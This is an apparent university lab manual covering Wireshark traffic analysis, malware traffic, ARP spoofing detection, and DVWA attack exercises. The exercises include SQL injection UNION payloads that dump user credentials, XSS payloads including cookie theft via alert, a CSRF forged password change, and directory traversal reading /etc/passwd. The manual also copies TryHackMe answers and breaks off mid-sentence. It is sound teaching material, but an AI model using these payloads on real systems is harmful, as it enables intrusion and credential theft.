EXPERIMENT -1

Objective: Basic Packet Inspection:

a) Capture network traffic using Wire shark

b) Analyze basic protocols to understand how data is transmitted and
received.

Basic concepts of the Network Traffic

IP Addresses:
It was designed for the devices to communicate with each other on a local network or over the
Internet. It is used for host or network interface identification. It provides the location of the
host and capacity of establishing the path to the host in that network. Internet Protocol is the
set of predefined rules or terms under which the communication should be conducted. The
types of IP addresses are IPv4 and IPv6.
 IPv4 is a 32-bit address in which each group represents 8 bits ranging from 0 to 255.
 IPv6 is a 128-bit address.
IP addresses are assigned to the host either dynamically or static IP address. Most of the
private users have dynamic IP address while business users or servers have a static IP address.
Dynamic address changes whenever the device is connected to the Internet.
Computer Ports:
The computer ports work in combination with the IP address directing all outgoing and
incoming packets to their proper places. There are well-known ports to work with like FTP
(File Transfer Protocol), which has port no. 21, etc. All the ports have the purpose of directing
all packets in the predefined direction.
Protocol:
The Protocol is a set of predefined rules. They are considered as the standardized way of
communication. One of the most used protocols is TCP/IP. It stands for Transmission
Control Protocol/ Internet Protocol.
OSI model:
OSI model stands for Open System Interconnect. OSI model has seven layers, namely,
Application layer, Presentation layer, Session layer, Transport layer, Network layer,
Data link layer, and the physical layer. OSI model gives a detail representation and
explanation of the transmission and reception of data through the layers. OSI model supports
both connectionless and connection-oriented communication mode over the network layer.
The OSI model was developed by ISO (International Standard Organization).
Capture network traffic
Steps: -
1. Open Wireshark software.

1
 2. By selecting the current interface, we can get the traffic traversing through that interface.
The version used here is 3.0.3. This version will open as:

The Wireshark software window is shown above, and all the processes on the network are
carried within this screen only.
The options given on the list are the Interface list options. The number of interface options will be
present. Selection of any option will determine all the traffic.

2
For example, from the above fig. select the Wi-Fi option. After this, a new window opens up,
which will show all the current traffic on the network. Below is the image which tells us about the
live capture of packets and our Wireshark will look like:
The above figure shows the packet content written in hexadecimal or the ASCII format. And the
information above the packet content, are the details of the packet header.
It will continue listening to all the data packets, and you will get much data. If you want to see a
particular data, then you can click on the red button.
The traffic will be stationary, and you can note the parameters like time, source, destination, the
protocol being used, length, and the Info.

Analyze basic protocols to understand how data is transmitted and received

Steps:-
1. Open the software.
2. Selecting an option from the Interface list options will determine all the traffic. For example,
in this PC, we have chosen the current network, i.e., the ETHERNET.
3. After connecting, you can watch the traffic below:

3
There is a filter block below the menu bar, from where a large amount of data can be filtered.
a. Apply a filter for HTTP, only the interfaces with the HTTP will be listed.

4
b. Apply a filter DNS, the interface will be listed with the DNS.

5
 EXPERIMENT -2
Objective: Detecting and Analyzing Suspicious Traffic with Wireshark.

Our main goal is to understand how to capture and analyze suspicious network traffic, specifically
focusing on a case where a Remote Code Execution (RCE) exploit has been performed. In this
hypothetical scenario, we have three main actors:
1. Suspicious Source IP — [Link]
2. Victim IP — [Link]
3. Local IP (our device) — [Link]
Our mission is to detect and analyze the suspicious traffic between the source and victim IPs, with
a view of better understanding the nature of the potential attack and aid in planning a response.
Setting up Wireshark
The first step is installing and configuring Wireshark, which can be downloaded from its official
website. Once installed, launch Wireshark and select the appropriate network interface that you
want to monitor. This would typically be the interface that is connected to the same network as
your suspicious source and victim IPs.

Capturing Suspicious Traffic

With Wireshark running and the right network interface selected, we can start capturing packets.
But we don’t want to capture everything — that could potentially lead to information overload.
Instead, we want to apply a filter that specifically targets traffic from our suspicious source IP to
the victim IP.
In the Wireshark filter bar, we can input the following expression:
[Link] == [Link] && [Link] == [Link]
This will capture packets originating from [Link] (the suspicious IP) and heading to
[Link] (the victim IP).
Analyzing the Capture
Once you’ve captured sufficient data, stop the packet capture by clicking on the stop button. Now
it’s time to dig into the data.
As we’re interested in a potential RCE attack, we should be looking for unusual patterns or
protocols that could indicate such an exploit. Common signs may include unexpected incoming
traffic on ports commonly associated with services that can execute remote code (such as HTTP
or SMB), repeated attempts to connect to a specific port, or evidence of a shell running on the
victim machine (like reverse shell connections).
Look at the different protocols involved, the ports used, the frequency of the connections, and the
payload of the packets. Right-click on a packet and select ‘Follow TCP/UDP Stream’ for a closer
look at the packet content.
Wrapping Up
Once you’ve analyzed the data, you should have a better understanding of what the suspicious
traffic was trying to do. In the case of an RCE exploit, you might be able to determine what code

6
was attempted to be executed, and on which service. This information is vital for network
administrators to patch vulnerabilities and ensure the future security of the system.
Remember, network monitoring and packet analysis is a continuous process. Attackers are
continually evolving, and so too should our strategies for defense. Stay vigilant, keep learning, and
keep your networks safe.

7
 EXPERIMENT -3
Objective: Malware Traffic Analysis: Analyze captured traffic to identify signs of
malware communication, such as command-and-control traffic or data infiltration.

SMTP (Simple Mail Transfer Protocol) traffic includes various login credentials from the infected
host. Of note, this traffic does not contain legitimate credentials. We populated the host with fake
login data before we ran the malware. Despite the fake data, this traffic provides a better
understanding of data stolen by Agent Tesla variants like Origin Logger.

When did the malicious traffic start at UTC?

In order to find the answer, we can use Wireshark.

This has been given as PST (Pacific Standard Time) and we can convert it to UTC.

Ok, as you can see we found the correct answer: 5 January 2023 22:51

8
What is the victim’s IP address?

We are now going to find the IP address of the victim. This should be an easy question because of
the given ARP:

The answer will be: [Link]

What is the victim’s MAC address?

As you can see, DNS protocol is used in this case.

9
If we click on DNS, and then onto source: Hewlett’s MAC address, we will be able to see the
correct answer.

What is the victim’s MAC address: [Link]

What is the victim’s Windows host name?

This will be an easy question to answer. You should filter: “dns or smb” to get the hostname of the
source address:

As you can see, if you filter with “dns or smb” you will see “Microsoft Windows Browser

Protocol”

What is the victim’s windows hostname: DESKTOP-WIN11PC

Victim’s Windows user account name: windows11userVictim’s Windows user account name:
windows11user.

10
What is the victim’s Windows user account name?

To find the victim's Windows user account name, we need to dive into the traffic. If the information
is being sent to C2 that means that the information is being sent over to SMTP protocol. You can
check our SMTP protocols.

What is the victim’s Windows user account name: windows11user

How much RAM does the victim’s host have?

On the same page, we can find the correct answer:

11
How much RAM does the victim’s host have: 32165.83. This was an easy one.

What type of CPU is used by the victim’s host?

On the same page, we can find the correct answer.

CPU: Intel(R) Core(TM) i5–13600K.

12
What is the public IP address of the victim’s host?

What type of account login data was stolen from the malware?

We can see that, email address and web account are given to the treat actor.

We can conclude that the victim has been hacked. We can decode the base64 string, but you can
also check at mail from section.

13
 EXPERIMENT -4

Objective: Password Sniffing: Simulate a scenario where a password is transmitted

in plaintext. Use Wireshark to capture and analyze the packets to demonstrate the
vulnerability and the importance of encryption.

Wireshark is a packet sniffing program that administrators can use to isolate and troubleshoot
problems on the network. It can also be used to capture sensitive data like usernames and
passwords. It can also be used in wrong way (hacking) to ease drop.
Packet sniffing is defined as the process to capture the packets of data flowing across a computer
network. The Packet sniffer is a device or software used for the process of sniffing.
Below are the steps for packet sniffing:
 Open the Wireshark Application.
 Select the current interface. Here in this example, interface is Ethernet that we would be
using.
 The network traffic will be shown below, which will be continuous. To stop or watch any
particular packet, you can press the red button below the menu bar.

Apply the filter by the name 'http.' After the filter is applied, the screen will look as:

14
The above screen is blank, i.e.; there is no network traffic as of now.
Open the browser. In this example, we have opened the 'Internet Explorer.' You can choose any
browser.
As soon as we open the browser, and type any address of the website, the traffic will start showing,
and exchange of the packets will also start. The image for this is shown below:

15
The above process explained is called as packet sniffing.

Username and password sniffing

It is the process used to know the passwords and username for the particular website. Let's take an
example of [Link]. Below are the steps:
 Open the Wireshark and select the suitable interface.
 Open the browser and enter the web address. Here, we have entered [Link], which is
highly secured. Enter your email address and the password. The image is shown below:

16
  Now, go to the Wireshark and on the filters block, enter 'frame contains [Link].' Then
you can see some traffic.

 Right-click on the particular network and select 'Follow', and then 'TCP Stream.' You can
see that all the data is secured in the encrypted form.

In the arrow shown above, the 'show and save data as' has many choices. These options areASCII,
C Arrays, EBCDIC (Extended Binary Coded Decimal Interchange Code), etc.
EBCDIC is used in mainframe and mid-range IBM computer operating systems.

17
 EXPERIMENT -5

Objective: ARP Poisoning Attack: Set up an ARP poisoning attack using tools like
Ettercap. Analyze the captured packets to understand how the attack can lead to a
Man-in-the-Middle scenario.

ARP Poisoning/Spoofing (A.K.A. Man in The Middle Attack):

ARP protocol, or Address Resolution Protocol (ARP), is the technology responsible for allowing
devices to identify themselves on a network. Address Resolution Protocol Poisoning (also known
as ARP Spoofing or Man in The Middle (MITM) attack) is a type of attack that involves network
jamming/manipulating by sending malicious ARP packets to the default gateway. The ultimate
aim is to manipulate the “IP to MAC address table” and sniff the traffic of the target host.

There are a variety of tools available to conduct ARP attacks. However, the mindset of the attack
is static, so it is easy to detect such an attack by knowing the ARP protocol workflow and
Wireshark skills.

ARP analysis in a nutshell:

● Works on the local network

● Enables the communication between MAC addresses
● Not a secure protocol
● Not a routable protocol
● It doesn’t have an authentication function
● Common patterns are request & response, announcement and gratuitous packets.
Before investigating the traffic, let’s review some legitimate and suspicious ARP packets. The
legitimate requests are similar to the shown picture: a broadcast request that asks if any of the
available hosts use an IP address and a reply from the host that uses the particular IP address.

18
A suspicious situation means having two different ARP responses (conflict) for a particular IP
address. In that case, Wireshark’s expert info tab warns the analyst. However, it only shows
the second occurrence of the duplicate value to highlight the conflict. Therefore, identifying
the malicious packet from the legitimate one is the analyst’s challenge. A possible IP spoofing
case is shown in the picture below.

19
Here, knowing the network architecture and inspecting the traffic for a specific time frame can
help detect the anomaly. As an analyst, you should take notes of your findings before going further.
This will help you be organised and make it easier to correlate the further findings. Look at the
given picture; there is a conflict; the MAC address that ends with “b4” crafted an ARP request
with the “[Link]” IP address, then claimed to have the “[Link]” IP address.

Let’s keep inspecting the traffic to spot any other anomalies. Note that the case is split into multiple
capture files to make the investigation easier.

20
At this point, it is evident that there is an anomaly. A security analyst cannot ignore a flood of
ARP requests. This could be malicious activity, scan or network problems. There is a new
anomaly; the MAC address that ends with “b4” crafted multiple ARP requests with the
“[Link]” IP address. Let’s focus on the source of this anomaly and extend the taken notes.

Up to this point, it is evident that the MAC address that ends with “b4” owns the “[Link]”
IP address and crafted suspicious ARP requests against a range of IP addresses. It also claimed to
have the possible gateway address as well. Let’s focus on other protocols and spot the reflection
of this anomaly in the following sections of the time frame.

21
There is HTTP traffic, and everything looks normal at the IP level, so there is no linked information
with our previous findings. Let’s add the MAC addresses as columns in the packet list pane to
reveal the communication behind the IP addresses.

One more anomaly! The MAC address that ends with “b4” is the destination of all HTTP packets!
It is evident that there is a MITM attack, and the attacker is the host with the MAC address that
ends with “b4”. All traffic linked to “[Link]” IP addresses is forwarded to the malicious
host. Let’s summarise the findings before concluding the investigation.

Detecting these bits and pieces of information in a big capture file is challenging. However, in
real-life cases, you will not have “tailored data” ready for investigation. Therefore you need to
have the analyst mindset, knowledge and tool skills to filter and detect the anomalies.

Note: In traffic analysis, there are always alternative solutions available. The solution type and the
approach depend on the analyst’s knowledge and skill level and the available data sources.

Detecting suspicious activities in chunked files is easy and a great way to learn how to focus on
the details. Now use the exercise files to put your skills into practice against a single capture
file and answer the questions below! Answer the questions below:

Use the “Desktop/exercise-pcaps/arp/[Link]” file.

Inside the exercise-pcaps folder, double-click on the arp folder.

22
Inside the arp folder you will see the [Link] file. Right-click on it, then choose Open With
Wireshark from the drop-down menu.

23
What is the number of ARP requests crafted by the attacker?

First, we need to figure out what the attacker’s IP or MAC address is. Taking into account from
the question, we are looking for ARP requests. So to me it seems like the attacker is scanning the
system. With all of this knowledge, we can start to figure out the filter we need to craft to be able
to find the answer. Scrolling up to the table that THM provided at the beginning of this task, we
can find a filter for possible ARP scanning. That being [Link].hw_mac==[Link].
Copy (ctrl+C) & Paste(crtl+P) or type the filter into the mint green filter bar in Wireshark, then
press enter.

From the results we can see that the Source MAC address seems to be scanning the system. This
could be our attacker, so to investgate this possibility, right-click on the Source MAC address.

24
Hover you cursor over the Apply as Filter. Another drop-down menu will appear. Move your
cursor over to the …and Selected and click on it.

Looking at the results it seems like we may have our answer. But since the question did say
Requests, then we want to confirm this. We can easily do this by adding onto our filter.

25
Following the syntax already established by the search parameters, along what THM shared at the
start of this task. We can add the following to the end of our filter: && ([Link]==1). Adding
this to the end of the filter will show only Arp Request from the suspected Malcious actor. Once
you have typed it into the mint green search bar, press enter to search.

The answer will be located in the bottom right of the Wireshark window. The number next to
Displayed is the answer to the question. Once you have found it, type it into the THM answer field.
The click submit.

Answer: 284

What is the number of HTTP packets received by the attacker?

Since we know what the MAC address is for the attacker, we can use that to search for the HTTP
packets. To do this you will need to follow a couple of steps. The first being in the Detail section
of Wireshark. You want to click on the drop-down carot for Layer 2. You will then see
Destination and Source, click on the drop-down carot for Source. We can now see the attacker’s
MAC address, time to apply it as a filter. To do this, right-click on Address: VMware_[Link]
([Link]). A drop-down menu will appear, move your cursor over top of Apply as
Filter. The final drop-down menu will appear, move your cursor over to Selected and click on it.

26
The filter will appear in the mint green Filter bar. Now before we press enter and use it, we need
to add to the filter. Since the question is asking for HTTP we can add to the end of the filter &&
http. This will search for any HTTP packets from our attackers MAC address. Now press enter to
use the filter.

You should now have all the HTTP packets attributed to the attackers MAC address. The answer
will be located in the bottom right of the Wireshark window. The number next to Displayed is the
answer to the question. Once you have found it, type it into the THM answer field. The click
submit.

27
Answer: 90

What is the number of sniffed username&password entries?

Heading back to Wireshark, we can stick with the filter we currently have to start investigating.
Looking at the Info section of the packet area, we can see an interesting frame. Inside this frame
we see POST and /[Link]

Inspecting the Details section, we can see that we are correct. We see the username and password.
Time to filter down so that we only see these types of packets.

28
To do this we first need to dig down a bit. Do this by clicking on the drop-down carot on Hypertext
Transfer Protocol. Again click on the drop-down carot next to POST /[Link]. You should
now see Request URI: /[Link]. Right-click on Request URI: /[Link], from the drop-
down menu hover your cursor over Apply as Filter. When the new drop-down menu appears, move
your cursor over to …and Selected. Then click on it.

As we can see we have 8 results left. Two of which seem to be a bit larger than the others. Let’s
check them out to see they contain usernames and passwords.

29
Taking a look we can see a username, but no password. So it seems safe to believe that the two
packets that are larger, do not contain passwords (feel free to take a look since there is only one
other packet).

30
So it looks like we need to count the other packets we have left. Once you have done this, type the
number into the THM answer field, and click submit.

Answer: 6

What is the password of the “Client986”?

Time to do some inspecting. We need to click on each of the packets. Then check out the detail
section of each. At the bottom of the Detail section is HTML Form URL Encoded: application/x-
www-for-urlencoded. Under this drop down is uname and pass. You need to look at each till you
find the uname Client986.

Once you find it, type the answer into the THM answer field. Then click submit.

31
Answer: clientnothere!

What is the comment provided by the “Client354”?

To be honest this took me a while to figure out as I was over looking and narrowed my scope to
much. I took a step back and removed the filter that showed only HTTP URI of /[Link]. To
do this delete that filter from the filter field, but don’t press enter to resubmit.

Now right-click on HTML Form URL Encoded: application/x-www-for-urlencoded. On the drop-

down menu, hover your cursor over Apply as Filter. Then an new drop-down will appear, click on
…and Selected.

32
Looks like we have two new packets, [Link] and [Link]. Since we want to see what
comment was made by client354. It is safe to say we want to check the packet containing
[Link], so click on it.

This was the right call, because as we can see we have client354 and comment. So if we look at
comment we can find the answer. Once you see it, type it into the THM answer field. Then click
submit.

33
Answer: Nice Work!

Task 4 Identifying Hosts: DHCP, NetBIOS and Kerberos

Identifying Hosts

When investigating a compromise or malware infection activity, a security analyst should know
how to identify the hosts on the network apart from IP to MAC address match. One of the best
methods is identifying the hosts and users on the network to decide the investigation’s starting
point and list the hosts and users associated with the malicious traffic/activity.

Usually, enterprise networks use a predefined pattern to name users and hosts. While this makes
knowing and following the inventory easier, it has good and bad sides. The good side is that it will
be easy to identify a user or host by looking at the name. The bad side is that it will be easy to
clone that pattern and live in the enterprise network for adversaries. There are multiple solutions
to avoid these kinds of activities, but for a security analyst, it is still essential to have host and user
identification skills.

Protocols that can be used in Host and User identification:

● Dynamic Host Configuration Protocol (DHCP) traffic

● NetBIOS (NBNS) traffic
● Kerberos traffic
DHCP Analysis

DHCP protocol, or Dynamic Host Configuration Protocol (DHCP), is the technology responsible
for managing automatic IP address and required communication parameters assignment.

DHCP investigation in a nutshell:

34
35
NetBIOS (NBNS) Analysis

NetBIOS or Network Basic Input/Output System is the technology responsible for allowing
applications on different hosts to communicate with each other.

NBNS investigation in a nutshell:

36
Kerberos Analysis

Kerberos is the default authentication service for Microsoft Windows domains. It is responsible
for authenticating service requests between two or more computers over the untrusted network.
The ultimate aim is to prove identity securely.

Kerberos investigation in a nutshell:

37
Detecting suspicious activities in chunked files is easy and a great way to learn how to focus on
the details. Now use the exercise files to put your skills into practice against a single capture
file and answer the questions below! Answer the questions below

Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/[Link]” file.

Going back to the folder where the pcapng file is located. Click on the Back button in the upper
left of the arp folder’s window.

38
Now being in the exercise-pcaps folder, double-click on dchp-netbios-kerberos folder to open it.

39
Now being inside the dhcp-netbios-pcaps folder, right-click on the [Link] file. From
the drop-down menu, click on Open With Wireshark.

40
What is the MAC address of the host “Galaxy A30”?

A way we can find this is using DHCP (Dynamic Host Configuration Protocol). Since DHCP will
will assign an IP address to everything attached to the network. From the reading above, we know
that the option for a DHCP request is 3. Along with that we are looking for a device the Galaxy in
the Hostname. So let’s build our filter with our knowledge, we can start with [Link] ==
3 which will look for DHCP request. Then and, followed by [Link] contains
"Galaxy". Which will look for any host names that have Galaxy in the name. All together the filter
looks like this: [Link] == 3 and [Link] contains “Galaxy” . After you
typed it into the mint green filter bar, press enter to filter for you query.

Looks like we are left with two results. Taking a look at the Source IP, we can see the first one is
coming from inside the system. While the second one looks to be outside the system getting an
interior IP address. Let’s take a look at this one, click on the result. In the Packet Detail section
let’s inspect the details by clicking the carot to drop the DHCP section.

41
Looks like we have a lot of info, so scroll down till you see the different Options.

Once you reach the Options section. You should see one labeled Option: (12) Host Name. Click
on the carot to drop down the details of this section. Taking a look at it we can see that is the
Galaxy A30 we are looking for. Time to scroll up just a bit to see the MAC

Address.

42
Once you see the Client MAC address: you have found the answer. You can type it into the answer
field. Or you can right-click on the Client MAC address. Then from the drop-down menu, hover
you mouse over Copy. A new drop-down will appear, move your mouse over to Value and click
on it. Now you can paste the answer into the THM answer field, and click submit.

Answer: [Link]

How many NetBIOS registration requests does the “LIVALJM” workstation have?

After reading the section above, the start of this should be pretty start forward. We are looking for
a the NetBIOS name. So to start crafting this filter we will use [Link] contains "LIVALJM".
Since THM gave us the name we added it into the section after contains. Once this is typed into
the mint green filter bar, press enter to filter for your query.

We are now left with the results that match the netBIOS name. But we can see that there is more
than just Registration requests. So if you want to you could use some counting to find the answer.
But I want to filter these so that only the Registration requests are the only thing that appears. To
do this we can click on the carot of the NetBIOS Name Service to reveal the details to help us filter
this down further.

43
The first thing that catches my eye is that in the section is Registration. Since we are looking for
registration requests, it seems like a great way to narrow this down. Click the carot to drop-down
the Flags section, to show more details. Inside this section we can see that Opcode: Registration is
5. I think we have enough to expand our filter.

Going back to the mint green filter bar. Start by typing and to include our next bit in the filter. The
next part we are looking for any packets that have the Ocode of 5 under the flags section. To do
this we use the following [Link] == 5. Once we have this typed into your filter field,
press enter to filter.

Looking at the top section, all we see is Registration Request now. Look at the bottom right of the
Wireshark window. You are looking for the word Displayed:. The numbers to the right of
Displayed, is the answer. Type the answer in the THM answer field, and then click submit.

44
Answer: 16

Which host requested the IP address “[Link]”?

Since the question is asking which host requested, it is safe to assume we could be jumping back
to DHCP type filters. With this knowledge, taking a look up at some of the examples given to us
by THM. One stands out, and that being the Option 50: Requested IP Address.

Let’s build the filter. On the mint green filter bar, we want to create the filter similar to
the other DHCP filter from before. Start with [Link] , as you type this you will see in
the drop down suggestion menu will be requested_ip_address . Either finish typing or
click on the suggestion to added it onto the filter bar. Now it’s time to add the IP address we are
looking for. We can do this with == [Link]. So the final filter should be built on the filter
bar. Only thing left to do is using it, so press enter to filter for our query.

45
As we can see there is only one result left. To find the name of the host we have to look in the
Dynamic Host Configuration Protocol section. Click the carot to drop down more details. Then
it’s time to scroll down till you see Option: (12) Host Name.

Once you find Option: (12) Host Name, click the carot to drop-down more details about the Host
Name. You will see a row with Host Name as the label. The answer can be found to the right of
this Label. Once you see it, type the answer into the THM answer field, then click submit.

Answer: Galaxy-A12

Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/[Link]” file.

Going back to the dhcp-netbios-kerberos folder, right-click on the [Link] file.

From the drop-down menu, click on Open With Wireshark.

46
What is the IP address of the user “u5”? (Enter the address in defanged format.)
After reading through the Kerberos section above, we learn if we want to search for a
username we use the filter [Link] contains "keyword" . So to look the the
user we are looking for we would change keyword to u5 . So the filter will look like
[Link] contains “u5” . Once this is typed into the mint green filter field,
press enter to filter.

As we can see from the results we have a couple of options. We can see the initial request come
in for authentication. What I want to do is narrow down the small field to only show the request.
To do this we want to add to the filter and to show that we want to include the next filter statement.
That filter being kerberos.as_req_element, which is looking for the request being made to the
Kerberos server. So the filter should now look like [Link] contains “u5” and
kerberos.as_req_element. After you type it into the mint green filter press enter to use it.

47
As we can see, we now only have 2 results. The question is asking for what the IP addres of said
user is. But they want it defanged for the answer. So let’s copy the Source IP address. To do this
first click on the Internet Protocol Version carot in the details section. Looking at the Details that
have now dropped down you will see Source, right click on it. From the drop-down menu, hover
you cursor over Copy. A new drop-down will appear, on this one you will see Value. Click on it
to copy the IP Address.

48
Time to Defang this IP, in a new browser head over to [Link]. Once there you will see on
the left side of the screen is a search bar under Operations. Type defang, into this search bar. You
will see Defang IP Addresses. Click and drag this into the center Recipe column.

On the right side of the screen you will see the Input box. Paste (ctrl+v) the IP Address into this
section. Then in the Output section will be the Defanged IP Address. Copy (ctrl+c) and Paste
(ctrl+v) the newly defanged IP into the THM answer field, then click submit

Answer: 10[.]1[.]12[.]2

What is the hostname of the available host in the Kerberos packets?

This one took me a bit to figure out. But as I tell myself re-read and go back. After re-reading,
THM gives a great filter above. Look at the section regarding CNameString.

49
We don’t need the full filter, instead we only need [Link] contains "$". Once we
have this typed into the mint green Filter Bar. Press enter to filter for any CNameString that would
have the Hostname in it.

You should be left with only one result. Time to get that Hostname, let’s start by following the
path down by clicking the carots of Kerberos > tgs-rep > cname > cname-string: 1 item. Once you
reach the final section, you will see CNameString:. The answer can be found to the right of this.
Type the answer you find in the THM answer field, then click submit.

Answer: xp1$

50
 EXPERIMENT- 6
Objective: SQL Injection: Use DVWA to practice SQL injection attacks.
Demonstrate how an attacker can manipulate input fields to extract, modify, or delete
database information.

Before we begin, we need to ensure that our DVWA security setting is low.

source code
The flaw in the code you provided is that it is vulnerable to SQL injection attacks. The vulnerability
arises from directly concatenating user input into the SQL query without proper sanitization or
parameterization.

Here’s an explanation of the flaw and the recommended solution:

In the code, the variable $id is retrieved from the user input without any validation or sanitization.
It is then directly concatenated into the SQL query string:

$id = $_REQUEST['id'];

51
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; This allows an
attacker to manipulate the value of $id and inject malicious SQL code, potentially leading to
unauthorized access, data leakage, or even complete loss of data.

This means that the query that was executed back in the database was the following:

1' OR
'1'='1'
#

52
'UNION SELECT table_name, NULL FROM information_schema.tables --

53
'UNION SELECT column_name, NULL FROM information_schema.columns WHERE
table_name= 'users' --

54
Now we can see we got both username and encrypted password. 'UNION SELECT user, password
FROM users --

55
Medium

We will intercept the request and send it to the repeater.

56
Edit id=1 to this code then send it and we can see the results in response.

1 UNION SELECT user, password FROM users --

High

For high level, after clicking the “here to change your ID”, we can see a window where we can
insert our malicious code.

57
' UNION SELECT user, password FROM users --

After submitting the code, we can get usernames and passwords.

58
 EXPERIMENT- 7
Objective: Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in DVWA to
inject malicious scripts into web pages. Show the potential impact of XSS attacks,
such as stealing cookies or defacing websites.

XSS is a technique in which attackers inject malicious scripts into a target website and may allow
them to gain access control of the website. If a website allows users to input data like comment,
username field and email address field without controls then attacker can insert malicious code
script as well.
TYPES OF XSS:

1. Reflected XSS
2. Stored XSS
3. Dom Base XSS
Reflected XSS(cross site scripting):RXSS:

In this case, hacker data is not stored on the website. reflected XSS only execute on the victim
side. reflected cross-site scripting A hacker sends input script that website then reflected back to
the victim’s browser, where hacker it executed the malicious JavaScript payloads. Let’s try cross
site scripting virtual environment Requirements:

a. Xampp or wamp
b. DVWA (Damn vulnerable web application)
c. Browser like Firefox, explorer, Cyberfox, Chrome e.t.c DVWA low level Reflected XSS:
Payload: <script>alert(“xss”)</script>

59
DVWA Medium Level Reflected XSS

Payload : <Script>alert(“hack by falcon”)</Script>

DVWA High Level Reflected XSS

Payload: <img src=x onerror=alert(“falcon”)>

Stored XSS (Cross site scripting):SXSS

Stored cross-site scripting (XSS) In this case the hacker malicious code is stored target website
and the web server. when an attacker can send malicious JavaScript into the website and that script
is executed other users’ computers that is stored (XSS) cross-site scripting.

60
DVWA Low Level Stored XSS:

Payload: <script>alert([Link])</script>

DVWA Medium Level Stored XSS

Payload : <img src=x onerror=alert([Link])>

DVWA High Level Stored XSS

Payload : <body onload=alert(“bingo”)>

61
DOM BASE XSS:

Dom base (XSS) cross-site scripting attack is a short-form document object model based cross-
site scripting. That is, the page itself HTTP response does not change, An attacker may use several
DOM objects to create a Cross-site Scripting attack. The most popular objects from this
perspective are [Link], [Link], and [Link].

DVWA low level DOM XSS:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>

DVWA Medium level DOM BASE:

Payload:
localhost/

62
dvwa/vulnerabilities/xss_d/?default=English#<script>alert(1)</script> and reload
your browser.

DVWA HIGH LEVEL DOM BASE:

Payload:

localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert([Link])</script>
and reload browser.

63
 EXPERIMENT- 8
Objective: Cross-Site Request Forgery (CSRF): Set up a CSRF attack in DVWA
to demonstrate how attackers can manipulate authenticated users into performing
unintended actions.

CSRF, which stands for Cross-Site Request Forgery, is a type of attack where someone takes
advantage of a user’s active session on a website to make them unintentionally perform actions
they didn’t intend to. This attack works when the user is already logged into the website or
application.

DVWA Security Low

Source code

The flaw in this code is that it lacks proper CSRF protection. It allows an attacker to craft a
malicious URL and trick a logged-in user into unknowingly executing unwanted actions on their
behalf.

The vulnerability lies in the fact that the code doesn’t include any mechanism to verify the origin
of the request. As a result, an attacker can construct a URL containing the necessary parameters
(password_new and password_conf) and send it to a victim. If the victim clicks on the malicious
link while authenticated on the vulnerable website, the code will execute the password change
without any further authentication or user consent.

Now, We are going to perform the attack

First, I will Create a new password “123” and click on Change

64
After changing the password you can see in the url is that it lacks the necessary CSRF token. In
the absence of CSRF protection, an attacker can still exploit this vulnerability by tricking the
victim into clicking on the URL while logged in to the vulnerable website.

Now we will Display the HTML code for the page, which includes a link to download a game

called “FIFA 2023. and password has been changed by attacker”

If attacker send this link to the victim, the password will be changed.

65
If the victim tries to open the html page. It will looks like this….

66
When victim tries to click on the FIFA link, the password “12345” will be changed automatically

We can see that password has been changed

low

Security: Medium

First things first, lets change the security level of the DVWA.

67
If we try to use low security method then it wont work anymore

Low

As we Know, we will first view the source code

68
The flaw in this code is a Cross-Site Request Forgery (CSRF) vulnerability. The code uses the
HTTP Referer header to check if the request came from the same server, assuming it’s a trusted
source. However, the Referer header can be easily manipulated by an attacker. This allows an
attacker to create a malicious website or craft a URL that makes a request to this script, tricking
the user’s browser into performing an unwanted action on their behalf, such as changing their
password without their knowledge or consent.

Can you see the difference? Within the legitimate request we see there is a Referer, where the
request came from. That matches up so the request goes ahead.

So what if we intercept the illegitimate request with Burp and add the HTTP Referer. Like so.

69
Paasword changed sucessfully

Now we will try to intercept the website and add legitimate Referrer using burpsuite

70
 EXPERIMENT- 9
Objective: File Inclusion Vulnerabilities: Explore remote and local file inclusion
vulnerabilities in DVWA. Show how attackers can include malicious files on a
server and execute arbitrary code.

What is File Inclusion Attack?

It is an attack that allows an attacker to include a file on the web server through a php script. This
vulnerability arises when a web application lets the client submit input into files or upload files to
the server. A file include vulnerability is distinct from a generic Directory Traversal Attack, in that
directory traversal is a way of gaining unauthorized file system access, and a file inclusion
vulnerability subverts how an application loads code for execution. Successful exploitation of a
file include vulnerability will result in remote code execution on the web server that runs the
affected web application.
This can lead to the following attacks:

1. Code execution on the web server

2. Cross Site Scripting Attacks (XSS)
3. Denial of service (DOS)
4. Data Manipulation Attacks Two Types:
a) Local File Inclusion
b) Remote File Inclusion
LFI vulnerabilities allow an attacker to read (and sometimes execute) files on the victim machine.
This can be very dangerous because if the web server is misconfigured and running with high
privileges, the attacker may gain access to sensitive information. If the attacker is able to place
code on the web server through other means, then they may be able to execute arbitrary commands.
RFI vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local
machine, the attacker is able to execute code hosted on their own machine.
Remote File inclusion (RFI) and Local File Inclusion (LFI) are vulnerabilities that are often found
in poorly-written web applications. These vulnerabilities occur when a web application allows the
user to submit input into files or upload files to the server. In order to demonstrate these attacks,
we will be using the Damn Vulnerable Web Application (DVWA).

there are some pre-requisites required:

1. XAMPP
2. Damn Vulnerable Web Application (DVWA)
NOTE: Currently, lets focus on file inclusion attacks. I am going to show you how to setup lab
using xampp, dvwa and many more in my next upcoming blogs.

71
Local File Inclusion in Action
Since you have an idea what LFI is, let’s see it in action. We will perform LFI attacks through
different levels of difficulty offered by DVWA.
Let’s start with low difficulty.
Difficulty: LOW
Now start your machine and login to DVWA, then go to DVWA security tab and change the
difficulty level to low.

Go to file inclusion tab and change the URL from [Link] to ?page=../../../../../../etc/passwd.

72
change the URL from?page=../../../../../../etc/passwd to ?page=../../../../../../proc/version.

73
Difficulty: MEDIUM
Now, go on and try the exploits we used in low difficulty. You will notice that you can’t read files
like before using the directory traversal method. So, as you can see in the below snapshot of source
page, the server is more secure and is filtering the ‘../’ or ‘..\’pattern. Let’s try to access the file
without ‘../’ or ‘..\’.

Change [Link] to /etc/passwd

Now,change the URL from?page=/etc/passwd to ?page=/proc/version.

74
As you can see, it worked by directly entering the name of the file. Let’s level up the difficulty to
HIGH.

Difficulty: HIGH
Change the difficulty to HIGH and try all exploits from medium difficulty, and you’ll notice none
of them will works because the target is more secure, as it is only accepting “[Link]” or inputs
